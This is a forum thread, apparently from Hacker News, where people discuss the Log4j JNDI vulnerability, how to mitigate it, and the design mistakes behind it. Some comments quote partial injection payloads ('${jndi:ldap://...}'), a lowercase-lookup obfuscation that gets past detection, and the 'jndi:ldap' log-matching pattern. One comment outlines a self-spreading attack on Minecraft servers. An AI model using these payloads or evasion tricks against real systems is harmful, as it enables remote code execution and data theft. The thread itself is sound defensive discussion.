We just spend the better part of the day going through applications and figuring out if they use log4j, if so which version, fixed code, notifying customers. Then we remembered that the majority of our servers can't actually reach the internet. They only accept requests, they cannot make outbound requests to the internet.
I know it a little old fashion, as explained to me by a customer earlier this year. In the age of cloud, people expect their servers to have a direct internet connection.
It's annoying to work with, but ideally your devices should only be able to reach the internet via a proxy and/or only whitelisted hosts. Understandably there are cases where this just isn't an option, but really do consider if your server truly needs to communicate with the internet at large. Can you use an HTTPS proxy, and just whitelists the required domains? The answer is most often "Yes", it's just a little more work.
Is there any chance that when asked to contact a service, your locked down machines first issue a DNS lookup to determine where to try to connect to, before the connection attempt gets blocked by your aggressive whitelisting?
If so, there might still be a DNS exfiltration vulnerability even on your tightly controlled setup.
I would love it if PAASs such as Heroku and Fly.io had configurable outbound firewalls. Especially when building with un-curated package managers such as NPM and PyPi, it’s virtually impossible to audit all dependencies.
Exploits like this and the now regular news of packages being replaced with backdoored versions makes me very nervous. Being able to whitelist what outbound connections were aloud would help enormously, even though it would not solve all potential exploits.
Is there a recommended way to do this with a Docker app?
Edit: Should note already use inbound waf like CloudFlare. What I want is something like Little Snitch but for a PAAS deployed app.
For PAAS this won’t work, but for on-prem stuff you can just log firewall denies on outbound traffic that will quickly let you know if somethings wrong.
You could have test environment where your container run for a few days, before pushing into production on a PAAS. Just run the container on a VM with IPTables and logging. It won’t find everything, some call might only be called on very specific circumstance, but it could find low hanging fruits.
Preach it. I have been the bane of third-party software vendors for years because I require a default-deny outbound policy for servers (and erring on the side of default-deny between subnets, generally).
This log4j vulnerability will serve, for me, as yet one more example as to why that's a good idea.
I think the bane is when you make it hard to get exceptions. If a developer can add a specific IP, or ideally a domain, to the "allow" group, automatically, that's far less impact than if you have to fill in pages of paper explaining why you need outbound access. In the latter case, developers will work around your restrictions, and you're simply left with a false sense of security.
Arguably you shouldn't make too hard to get exceptions, but what we frequently see is that the developer actually don't appear to know that their code is make outbound connects, and they certain don't mention it as part of the requirements.
We've frequently build setups where machines are completely isolated, because the requirements do not mention that this software will connect to servers on the internet. When we install the software it then fails to work, because it was never testet in a closed environment. I've seen Java applications fail to boot because they cannot can't pull a XSD from the internet... Why isn't that just bundled? Why do you need to get that a boot time? What is that other server is down?
But you're right, valid firewall opening should not be hard get.
So many vendors (I work with a lot of COTS software-- not in-house-developed) have absolutely no idea what their communication dependencies are (client-to-server, server-to-server, etc). I've ended up being the first sysadmin to ask more times than I'd like to count.
I, like the grandparent poster suggested, prefer to put applications where the developer demands carte blanche access to the Internet via TCP port 443 behind a MiTM proxy and whitelist domains. (I don't do as much to stop DNS-based exfiltration as I should be doing, though. It's probably a good time to revisit that using this vulnerability as a practical justification.)
> I know it a little old fashion, as explained to me by a customer earlier this year.
It is only outdated by proponents of cloud services since IP based filters are difficult to implement and/or require high maintenance.
Otherwise sensible network segmentation and access rules are pretty much one of the best security mechanisms you can implement, far beyond the usual theatre some security products want to sell.
> proof-of-concept (PoC) code has evidently been available since March of 2021
This Github repo was for an older vulnerability[1] (CVE-2019-17571).
> monitor web application logs for evidence of attempts to execute methods from remote codebases (i.e. looking for jndi:ldap strings)
As the templates are interpreted recursively, the payload can easily be obfuscated, e.g. using "${${lower:j}${lower:n}..."[2]. I saw e.g. binaryedge's scanner already use that trick.
I've seen a couple dozen attempts with "jndi", but nothing matching "j.n.d.*i". Very few attacks though - I remember the height of the Code Red days, I was seeing orders of magnitude more attempts.
I've not seen much speculation on how this bug was created in the first place, so I'll take a guess here:
On https://logging.apache.org/log4j/2.x/manual/lookups.html it says: "Lookups provide a way to add values to the Log4j configuration at arbitrary places." I think, the person/team that implemented the Lookup feature never indented it to be used outside of the configuration files, which are clearly part of the codebase and therefore trusted. I can fully understand why this is seen as a useful feature.
Then someone else came, saw that there's a useful feature that allows to automatically extend stuff like the request URL in a log message, and embedded that in the log message parser. I don't think this should ever have been implemented, and surely not enabled by default. Even if there was no LDAP remote code execution (ok, we can blame Java for this) or JNDI lookups (which can leak data to the outside), this lets user provided input be used as a query to all the stuff that can be inserted by Lookups (environment vars, request headers, JVM arguments, ...) For example, someone who just has access to the logs can use this to query secrets stored in the environment of the app.
> According to a translated technical blog post , JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load a remote codebase using LDAP.
As for JDK 8, numerous outlets are reporting that it is actually Java 8u121 that protects against JNDI remote class loading by default (see release notes https://www.oracle.com/java/technologies/javase/8u121-relnot...). That was released in 2017-01, which was just about five years ago. I think that should save a lot of peoples' bacon, should it not?
This post claims the history of which releases closed which holes is a bit more complicated and that 8u191 really is the first release to prevent this particular exploit. However it also points out that it’s still possible to achieve RCE via log4j template expansion in certain Tomcat and Websphere configurations:
The remote class loading is the most severe part of this but even without that this vulnerability still does things like leak environment variables to arbitrary remote endpoints.
Not really? Your link shows that the log4j is not used in core Jenkins.
Moreover, they provided a nice test to see, on a particular installation, if any plugins are affected. Judging by the provided link to their issue tracker (https://issues.jenkins.io/browse/JENKINS-67361?jql=labels%20...), there only seem to be a handful of plugins affected, and none appear to be super widely used.
They are responding really well to this, by the way. That blog post is clear and useful information is being added. Kudos to the Jenkins team!
I agree with this, I think Jenkins as an attack vector is likely to be low. It's very possible, for example, to pull in a malicious dependency that then output a message that was logged and took advantage of this vulnerability.
But, at that point, if you've already pulled in a malicious dependency you're probably already screwed by an easier method than this log4j issue.
This also affects Minecraft servers afaik. There is probably a huge amount of internet exposed resources running vulnerable versions that are unlikely to be patched.
Minecraft is specifically one of the most vulnerable because the chat is written to the server log. So, all it takes is a chat message to run the exploit.
A specially formatted log entry can cause the logging library to fetch and run remote code. So if you're printing something a user provides into your logs, you're decently likely to be screwed.
More amazingly, this is intentional. If you didn't want log4j to trivially exec remote code, you were expected to add a properties file telling it not to.
This part is really beyond baffling to me. I could understand pre-configured format strings being allowed to do some crazy shit, but I can't for the life of me understand why log4j would opt to allow any logged string to be given access to a powerful lookup/configuration language, even beyond the specific JNDI issue at hand.
Enterprise software needs infinite features. There is no saying "no" to a feature request on enterprise software. Its OK most of those servers are inside the enterprise only and are extensively firewalled anyway and nobody would do "debugging" logging on a "production" server anyway, that's not very enterprise-y, and professional sysadmins know what they're doing.
Somehow ends up installed on ten million completely unmaintained minecraft servers directly connected to the raw internet with no firewalling and not really any sysadmin skills, then chaos ensues.
I would suggest at least two important mechanisms at work.
First, template libraries have a fundamental drive towards power. A lot of people will talk big about separating the data from the template, but my gosh it's convenient to put for loops in your template, and be able to resolve properties, and before you know it, one feature at a time, your template code is basically as powerful as your local reflection capabilities. Sometimes, as may have happened here, even the people implementing these powerful features do not know how powerful they are. So there's this powerful pull on template libraries to become more and more powerful.
But they're usually written from an assumption of the user of the template having full control over the contents and that nobody is maliciously feeding content to it. It's an assumption that template libraries often start with, as an unspoken and unexamined assumption. Unbeknownst to the template library author, someone out in the world turns out to want templates, because they're so useful and convenient, and the person picking the template library may never consider whether or not the template library they are using matches the security profile they need, because quite often literally nobody at any point of this process is really thinking about that. So it's really easy for someone to grab a templating library that is way too powerful. They're likely to even consider "way too powerful" as a feature.
Second, there is a common mistake made in reflection-type APIs shared by many dynamic languages (dynamic languages have their "reflection-type APIs" simply built in, static languages usually have a library/module/package), and also in this case, Java, whereby there is some API to take some sort of string that identifies a class, and get an instance of it, or whatever the local equivalent is. Unfortunately, this turns anything that can invoke this functionality into arbitrary function execution, and "arbitrary function execution" is often leveragable into "arbitrary code execution" with only a bit more work. Again, this is done because it's really convenient and powerful, but it also means there's this Magic Portal in your language where if something can reach out to that functionality, then it can reach anything in the runtime, or possibly beyond if code can be loaded (which it usually can).
These two things, when combined, create devastating security bugs. Relatedly, overaggressive deserializers can also serve as your gateway into reflection ("my gosh it's convenient to be able to name arbitrary classes and deserialize into instance of them"), which is what Ruby had with its YAML arbitrary code execution a few years back. The combination of "some way into the reflection system" and "a reflection system that allows access to all classes in the system" is deadly.
Taking it one "why" further down, I think developers do not in general understand the interplay between "power" and "restrictions". There's a lot of developers who, given the choice, will always choose power, but in a multi-user world, that means you lose out on some very useful restrictions. A "power programmer" may chafe if they have to work in Go or C or C++ or some other language that doesn't have the built-in "name a class with a string, get an instance" functionality, but having that restriction around turns out to be very useful.
When you add more "power" to anything, you should always flip the question around and consider it from the dual perspective of "what restrictions am I losing in order to obtain this power?" Sometimes it will be nothing you care about, and in that case, go for the power by all means. But sometimes, deliberately putting down the "power" to simply name a class and get an instance means you're putting in a very, very useful guard rail.
(If you think about it, there's almost never a situation where you need to name an arbitrary class. You can almost always instead force some sort of manual registry of such things. Even cases you might think otherwise like "interpreters" you could probably still force manual registration of allowed classes. Only a very privileged interpreter that is very trusted could be allowed to have that power and lose that restriction.)
It is really easy to lose track, in all these moving pieces, of the fact that you've given away too much power.
Is there a more generous perspective than this? I've been reading but from what I can tell this was just a terrible idea. Hindsight is 20/20 and all - but really?
I think the "generous" perspective is that there was a JRE update once which disabled the remote code execution feature by default. Note, this was a JRE update, not a log4j update.
Note, as others have commented, the JRE change prevented the fully open-ended RCE where you could download classfiles from an external server and run them. However, the log4j bug does still allow posting of environment variables to external servers, even with the JRE changes, which could be just as catastrophic.
That was my understanding anyway, someone correct me if I'm wrong.
No, the log4j devs really seem to have thought it was a good idea to have this (1) built, and (2) enabled by default. One of them was on twitter whinging that they needed it for backcompat. I just can't.
I'm no expert but shouldn't servers be behind some sort of firewall so they won't download code (or anything else) from random remote machines? Why would a server need unfettered access to the outside internet during standard operations?
They should, but they often aren't. Also, even if they are, this can be exploited with a port number the attacker picks. So unless you specifically whitelisted what outbound hosts your machine can reach and only those (which is rarely done and not always possible), it isn't likely to help.
Shortest version: log4j has a helpful "feature" where if you log a specifically formatted string as a value, it can trigger things like DNS lookup or remote code execution.
If you use a vulnerable log4j version to log any user-controlled value (such as a User-Agent header), it's a bad time.
Evidently Minecraft used log4j to log user chat messages, allowing a player on a server to leak other players IP addresses.
So far people have been showing off RCE "hello world" for both minecraft clients and servers on twitter.
In terms of actual threat this exploit could be easily abused to rapidly spread ransomware, cryptominer malware, botnet slave code, and other nasties extremely easily.
You could (devs on twitter have been playing with this) build a script that connects to random servers listed on Shodan and send a message with a payload in it. This payload then executes on both the clients and the server infecting them. Then those clients can have their credentials and server lists used to infect other servers and clients. Considering how many Minecraft servers are just thrown up on old windows machines by people with little to no IT knowledge, I can see this getting out of hand very quickly.
How does the downloaded java class get executed though? I get that you can get the logger to download from a server but what needs to be on the server? e.g. how does it trigger the malicious java class? Does it need to contain certain methods/interface?
A serialized instance of the class is downloaded and deserialized. That the class itself is also downloaded (based on server-provided auxiliary download locations) is a secondary feature. The downloaded instance is then deserialized, which may run a custom deserialization method of the class, which in turn would contain the malicious code.
The serialized object doesn’t contain any code. But the client needs the code of object’s class to deserialize it.
Instead of providing the object directly, the server can provide a JNDI object reference, which (among other things) contains a `classFactoryLocation` attribute specifying an URL where the bytecode of the class of the serialized object can be downloaded. If the class isn’t already present in the client’s codebase, the client proceeds to download it, in order to then be able to deserialize the actual object of interest.
This only works over LDAP, with the intended use-case that enterprises store and organize their code repository as part of their LDAP directory.
the library parses logged messages for commands, which include a command which can be used for "connect to this server, download code from there, run it". To exploit it, put such a command into any place the app will write to log.
Actually, the command is "download this serialized Java object", and the server serving the object can add "by the way, you will need these classes for deserializing the object", and the client "ok, I’ll download those as well then", and upon deserializing the object, code from the downloaded classes is run (the actual RCE) in order to initialize the class and deserialize the instance.
Can someone clarify if this template expansion happens only in format string or in the substituted string as well.
I.e. is it affecting just code like this:
It's been widely reported that iCloud is exploitable (by setting your phone's name to something that includes the "${jndi:ldap://...}" incantation), so if you're using an iPhone, cloud services you use may have been compromised. Haven't seen an assessment yet of exactly what's at risk from that. Also haven't seen much about Android apps using log4j -- depending on how (and whether) Android's nonstandard library handles JNDI, this may be mitigated, but stay tuned.
As to home PCs -- if you're running anything written in Java which logs strings under somebody else's control (email subject lines, to cite one potentially plausible example), well... they might be able to run code on your box.
It's not clear if iCloud is exploitable. Just the DNS lookups do not prove that remote code execution via ldap is active. In fact, if they are using an up to date JRE, it's not.
I tried to exploit my own apps and could only get it to work when setting com.sun.jndi.ldap.object.trustURLCodebase to true
I'm not a security expert. I spent a good chunk of time yesterday mitigating this with our security people so I have a decent overview of the bug and how it's exploited. If you aren't running an application on your home server or phone that others can connect to from outside your network then this isn't likely an issue for you. Take this as inexpert guidance until someone more authoritative chimes in. The vector of vulnerability here is user content getting into log messages, as can happen if you log headers from user connections for example.
Actually, the surface of attack is larger. It is: the machine receives strings from a service that's been connected to the internet somehow and the machine itself server can connect to the internet. A non-obvious example would be logs/data that will be processed by Solr.
> If you aren't running an application on your home server or phone that others can connect to from outside your network then this isn't likely an issue for you.
The direction of the connection isn't relevant. For instance, when you are playing Minecraft and connect to a server, the connection starts from inside your network, but could be used to attack your Minecraft client.
Big picture being missed, there's a societal argument for decades over once you log something you're responsible for it and who owns the logs of what you do and the profit generated by Big Brother, etc.
So right to be forgotten, all kinds of tracking laws depending on a mix of who owns the device vs where its geographically located today, and now if you log stuff like user agent strings, someone can send you a very toxic string that causes enormous problems.
The very short term solution is to fix big brother so he can go back to safely watching our every move, the longer term question is how many security problems are you willing to have in order to extensively and permanently track and log people?
There is also an interesting "tree falls in the forest" effect where if you know there will be no professional sysadmin support to debug or fix or work on your minecraft server, why are you making logs, if logging can be exploited just like anything else can be exploited? I worked with a guy in the early internet days whom wanted an old fashioned page every time an exploit came in from China; I asked what is actionable about that, other than they can DDOS his pager and he can't call in an airstrike on them? He disabled his pager notifications, they were of negative net value. We are nearing that point for extensive logging.
Its very hard to use a log exploit on software that doesn't log. So why are so many things logged, that shouldn't be logged because its inconceivable that a pro would ever access the logs or its inherently bad to log that kind of PII for ethical reasons?
User data is historically seen as always the purest of gold nuggets to be hoarded and traded for valuables; reality is sometimes user data is plague blankets and you don't want them. May be nearing a point where "log everything" has a negative value.
Software only increases in complexity over time; complexity means more security problems; at some point "log everything" has too many downsides and not enough upsides. The world's only going to have more "little bobby tables", not fewer.
Certainly the long term solution to millions of minecraft servers logging dangerous packets is to not log at all. There's not a downside.
However as I don't have log4j on the outside it's fine (it gets redirected to https, and then asked for an x509 certificate, which it doesn't provide, so gets dropped)
Minecraft logs every message from other players it receives, so all you have to do is type a message and everyone on the server is exploited.
Yes this is still possible if you log any user-modifiable value. One example would be logging out a user agent header - if an attacker spoofs this to include a JDNI URI then the vulnerability can be exploited.
This is why this CVE is so scary - I would imagine the majority of applications using log4j will log out a user-supplied value at some point.
How about feeding the magic string via Host header in your requests and then cutting off? You wouldn't even need to establish the full TLS handshake, SNI is sent in the clear, and you would get to hit every single load-balancer and middle box - and everything they send their logs to.
Are you ever logging strings that come from outside your software, be it things users type in, HTTP headers, ...? Then you don't control if you are "using any of the jni special Uris".
This vulnerability is equivalent using printf(userData) when you should have done printf("%s", userData). From the perspective of the library developer, the feature is only available in the format string.
The log4j maintainers seem to have realized that this (the "%m" in a PatternLayout doing lookups) is a bad idea around version 2.10 (released in 2017) or even version 2.7[2] (released in 2016). These versions both included changes that allowed you to disable this behavior. Unfortunately, the Java compatibility mindset meant that they didn't take the further logical step of making the behavior that disables lookups the default.
I think this vulnerability should be used as a lesson against the vagaries of the classic Java API design issues that we're now finally starting to turn away from. Having an extensible formatting mechanism is not necessary a bad idea, but the problem with this and so many other "magic" features provided by Java libraries is that they are:
* Opt out, instead of opt-in
* Hard to discover - if you don't read the ENTIRE log4j documentation (which is pretty large!), it's hard know that this stuff is happening.
* Too inclusive - adding JNDI was a bad idea, but even allowing things like environment variables or JMX Beans to be looked-up wholesale from a non-sanitized message is a bad idea.
The problem is much deeper than log4j really. In hindsight, features like JNDI, RMI, and most of all Java Serialization should have never been part of Java in the first place.
If you log any sort of input from outside, then attackers get to supply their own URLs.
This will trigger even if you're doing it yourself because log4j also keeps recursively expanding macros in the log string until no more are found. So parameterizing your log statements isn't a defense against this the way parameterizing your SQL statements would be for SQL injection.
Meta: This website has one of the worst and most ridiculous cookie opt-out mechanisms. You are expected to read through a wall of text and follow complex instructions to manually opt-out of each vendor.
The fact that Java can download, parse, and load code is the original sin of the runtime. It never made sense and the classloader has been exploitable from Day 1. They need to rip out the whole concept, and RMI needs to be eradicated as well.